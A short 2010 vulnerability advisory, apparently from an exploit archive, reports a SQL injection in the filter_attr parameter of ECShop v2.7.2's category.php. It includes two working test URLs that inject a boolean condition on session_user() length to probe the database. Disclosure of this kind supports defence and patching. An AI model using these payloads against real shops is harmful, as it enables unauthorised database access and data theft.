ECShop v2.7.2 Remote SQL Injection Vulnerability

2010-05-10 19:37:55

ECSHOP is one of the most famous shopping apps of china.

The last vesion of ECShop is V2.7.2. It has a OR_NUM type injection in
filter_attr Parameter of category.php.

For example:

http://www.example.com/shop/category.php?page=1&sort=goods_id&order
=ASC#goods_list&category=1&display=grid&brand=0&price_min=0
&price_max=0&filter_attr=-999


Test it :

http://www.example.com/shop/category.php?page=1&sort=goods_id&order
=ASC%23goods_list&category=1&display=grid&brand=0&price_min
=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20
or%201=2

http://www.example.com/shop/category.php?page=1&sort=goods_id&order
=ASC%23goods_list&category=1&display=grid&brand=0&price_min
=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=15%20
or%201=2


Liscker
2010.05.07

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.